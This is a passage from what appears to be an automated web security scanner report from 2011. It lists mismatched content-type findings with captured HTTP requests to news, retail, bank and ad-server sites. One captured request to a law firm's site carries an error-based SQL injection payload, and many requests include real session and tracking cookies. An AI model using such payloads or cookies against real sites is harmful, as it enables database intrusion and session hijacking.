Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; F1=B87Q63EBAAAABAAAAgAASCA; BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Fri, 17 Jun 2011 17:06:31 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 17:56:19 GMT
Content-Length: 2793
Connection: close

<html><head></head><body><script type='text/javascript'>
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

23.47. http://view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=advertop100&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249153945&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-18-06-44_13548876581308247604; SERVERID=s15

Response

23.48. http://www.inlandbusinesslaw.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/

Request

GET / HTTP/1.1
Host: www.inlandbusinesslaw.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 21:20:01 GMT
Content-Length: 12119
Content-Type: text/html
Content-Location: http://www.inlandbusinesslaw.com/index.htm
Last-Modified: Thu, 16 Jun 2011 17:55:55 GMT
Accept-Ranges: bytes
ETag: "826496a34e2ccc1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="robots" content="index, follow"><META HTTP-EQUIV="CACHE-CONTROL" CONTEN
...[SNIP]...

23.49. http://www.inlandbusinesslaw.com/attorneyprofiles.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/attorneyprofiles.html

Request

Response

23.50. http://www.inlandbusinesslaw.com/contactus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/contactus.html

Request

Response

23.51. http://www.inlandbusinesslaw.com/mentoringprogram.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.inlandbusinesslaw.com
Path:	/mentoringprogram.html

Request

GET /mentoringprogram.html HTTP/1.1
Host: www.inlandbusinesslaw.com
Proxy-Connection: keep-alive
Referer: http://www.inlandbusinesslaw.com/contactus.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:10:55 GMT
Content-Length: 9059
Content-Type: text/html
Last-Modified: Thu, 16 Jun 2011 17:55:54 GMT
Accept-Ranges: bytes
ETag: "661688a34e2ccc1:6b9"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="robots" content="index, follow"><META HTTP-EQUIV="CACHE-CONTROL" CONTEN
...[SNIP]...

23.52. http://www.nutter.com/attorneys.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nutter.com
Path:	/attorneys.php

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

24. Content type incorrectly stated previous next
There are 45 instances of this issue:

http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
http://480-adver-view.c3metrics.com/v.js
http://a1.interclick.com/getInPageJS.aspx
http://a1.interclick.com/getInPageJSProcess.aspx
http://adadvisor.net/adscores/g.js
http://amch.questionmarket.com/adscgen/st.php
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn.slidesharecdn.com/nasbocasestudy110110-101102172823-phpapp02-thumbnail-2
http://cdn.slidesharecdn.com/thisoldportal2007-100208005551-phpapp02-thumbnail-2
http://cdn.slidesharecdn.com/yourjourneyyourway-100208010117-phpapp01-thumbnail-2
http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm
http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm
http://ilslaunch.app2.hubspot.com/salog.js.aspx
http://m.cnbc.com/mytest/ipecho.php
http://media.cnbc.com/i/CNBC/Sections/Home/__COVER/__COMPONENTS/MarketOverview/sub_head_bg2.jpg
http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PILLS_ALLEN/news_bug_must.jpg
http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html
http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js
http://rt.legolas-media.com/lgrt
http://s.wsj.net/public/resources/documents/ac_keyword_exception_list.js
http://sales.liveperson.net/hcp/html/mTag.js
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://sr2.liveperson.net/hcp/html/mTag.js
http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8
http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15
http://view.c3metrics.com/c3VTabstrct-6-2.php
http://www.cnbc.com/default.ashx/id/23149822
http://www.facebook.com/extern/login_status.php
http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json
http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/baseline.json
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_email.gif
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_print.gif
http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png
http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService
http://www.ilslaunch.com/sites/all/themes/ils/favicon.ico
http://www.lightsquared.com/wp-content/themes/lightsquared/css/type/titilliumtext22l004-webfont.woff
https://www.mavitunasecurity.com/support/checkupdate/
http://www.nutter.com/attorneys.php
http://www.res-x.com/ws/r2/Resonance.aspx
http://www2.sesamestats.com/paneltracking.aspx

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

24.2. http://480-adver-view.c3metrics.com/v.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

24.3. http://a1.interclick.com/getInPageJS.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.interclick.com
Path:	/getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=13501&cid=1240946772498 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1308573230578&e90=1306586030476&e50=1308573231659&e100=1306586032110; Aqprep_Banner728X90=154840=634415637907052842:50930&157035=634420788550214247:51744; Aqprep_Banner160X600=157033=634420788549939172:51744; Aqprep_Banner300X250=157034=634420788548305005:51744&161467=634415638953988496:51417; Li=1=734283&30=734277; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Thu, 16 Jun 2011 19:16:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 13:16:11 GMT
Content-Length: 6347

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

24.4. http://a1.interclick.com/getInPageJSProcess.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.interclick.com
Path:	/getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.5. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adscores/g.js?sid=9212076087 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/ticolscr.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ab=0001%3AKWC5MC0x1u8zvrMcq4GCWFCj5DwPkE0L

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 14:19:14 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 38
Content-Type: application/javascript

TargusCallback("000", "", "", "", "");

24.6. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.8. http://cdn.slidesharecdn.com/nasbocasestudy110110-101102172823-phpapp02-thumbnail-2 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.slidesharecdn.com
Path:	/nasbocasestudy110110-101102172823-phpapp02-thumbnail-2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /nasbocasestudy110110-101102172823-phpapp02-thumbnail-2 HTTP/1.1
Host: cdn.slidesharecdn.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: H6ckJI8TJPW1eDD2dqWwG6lugvTjy5En5mBSaE9p4t/NVa/ynJI3s/nGgQBY/BEI
x-amz-request-id: 4C8339502EBB5B6C
Last-Modified: Tue, 02 Nov 2010 22:28:37 GMT
ETag: "5b47fe3cdc769bca141b2b26f6444f41"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 4850
Server: AmazonS3
Date: Thu, 16 Jun 2011 11:15:52 GMT
Connection: close

......JFIF.....H.H.....C........... .
................... $.' ",#..(7),01444.'9=82<.342........x....................................A.........................!1A.."Qa2q.....#B..$%R..3b...&r4CDTc....
...[SNIP]...

24.9. http://cdn.slidesharecdn.com/thisoldportal2007-100208005551-phpapp02-thumbnail-2 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.slidesharecdn.com
Path:	/thisoldportal2007-100208005551-phpapp02-thumbnail-2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /thisoldportal2007-100208005551-phpapp02-thumbnail-2 HTTP/1.1
Host: cdn.slidesharecdn.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: 2Hi1dw9l5Z1wQb0ut9ZoBuxzdEP7vncGlS+YuiZMr6FeSdUNnvNNofDYGAVQWeL8
x-amz-request-id: E6AF06872DE64069
Last-Modified: Mon, 08 Feb 2010 06:56:06 GMT
ETag: "4fbea4017cd16441d06af0839ec81e2d"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 4361
Server: AmazonS3
Date: Thu, 16 Jun 2011 11:15:52 GMT
Connection: close

......JFIF.....H.H.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222........x.."..............................
...[SNIP]...

24.10. http://cdn.slidesharecdn.com/yourjourneyyourway-100208010117-phpapp01-thumbnail-2 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cdn.slidesharecdn.com
Path:	/yourjourneyyourway-100208010117-phpapp01-thumbnail-2

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a JPEG image.

Request

GET /yourjourneyyourway-100208010117-phpapp01-thumbnail-2 HTTP/1.1
Host: cdn.slidesharecdn.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: pYa55/3Vgq2NDae9M8dJozxd7SsTEf9uREPyepNnsJaeFQyxd+7JdaBH4IUaJdWF
x-amz-request-id: 79CDE377C8C73A55
Last-Modified: Mon, 08 Feb 2010 07:02:12 GMT
ETag: "2244a69abb8ad4dbdc87b2a9dc105ce8"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 4741
Server: AmazonS3
Date: Thu, 16 Jun 2011 11:15:52 GMT
Connection: close

......JFIF.....H.H.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222........x.."..............................
...[SNIP]...

24.11. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://creditcards.citicards.com
Path:	/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.12. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.13. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.14. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.15. http://ilslaunch.app2.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ilslaunch.app2.hubspot.com
Path:	/salog.js.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

24.16. http://m.cnbc.com/mytest/ipecho.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://m.cnbc.com
Path:	/mytest/ipecho.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

24.17. http://media.cnbc.com/i/CNBC/Sections/Home/__COVER/__COMPONENTS/MarketOverview/sub_head_bg2.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://media.cnbc.com
Path:	/i/CNBC/Sections/Home/__COVER/__COMPONENTS/MarketOverview/sub_head_bg2.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /i/CNBC/Sections/Home/__COVER/__COMPONENTS/MarketOverview/sub_head_bg2.jpg HTTP/1.1
Host: media.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Thu, 20 Mar 2008 19:44:09 GMT
Accept-Ranges: bytes
ETag: "80a9ac3c28ac81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 260
Date: Thu, 16 Jun 2011 11:24:50 GMT
Connection: close
Cache-Control: public, max-age=14400

GIF89a..#...............................................................................................................................................................................................
...[SNIP]...

24.18. http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PILLS_ALLEN/news_bug_must.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://msnbcmedia.msn.com
Path:	/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PILLS_ALLEN/news_bug_must.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /i/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PILLS_ALLEN/news_bug_must.jpg HTTP/1.1
Host: msnbcmedia.msn.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=e9b0b7965c774fdb94f4dbbf73989380; mh=MSFT; CC=US; CULTURE=EN-US; v1st=D4335FAB02FF2C98; ATC_ID=173.193.214.243.1307039206918742; VWCUKP300=L123100/Q72318_13861_1563_060211_1_060311_443106x442830x060211x1x1/Q73186_13384_1473_060111_1_061517_449169x449165x060111x1x1; __qca=P0-1267859454-1307060745444; MSNMOBREP=dcecbf9971484c8dbc4017eb007d89c3; expid=id=4a7a2cfa63914a13b3d0d2ba28a1bace&bd=2011-05-20T00:26:57.567&v=2; SRCHHPGUSR=AS=1; Sample=93; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:46 GMT
Last-Modified: Thu, 20 Mar 2008 20:26:32 GMT
Content-Type: image/jpeg
ETag: "0c59afc88ac81:0"
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 108

GIF89a...........5..F....!.......,..........=.......<..+..\7...(.%......ir.....^.t.....p.\l..t:..g.EV......;

24.19. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://online.wsj.com
Path:	/public/page/0_0_WC_HeaderWeather-10005.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /public/page/0_0_WC_HeaderWeather-10005.html HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3dna%7c%7czip%3d20001%2d20020%7c%7ccountry%3dus%7c%7cregion%3ddc%7c%7cORCS%3dna%2cus%7c%7ccity%3dwashington%7c%7clongitude%3d%2d77.0369%7c%7ctimezone%3dest%7c%7clatitude%3d38.8951; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:19 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep03 - Wed 06/15/11 - 00:34:04 EDT
Cache-Control: max-age=15
Expires: Thu, 16 Jun 2011 11:22:34 GMT
Vary: Accept-Encoding
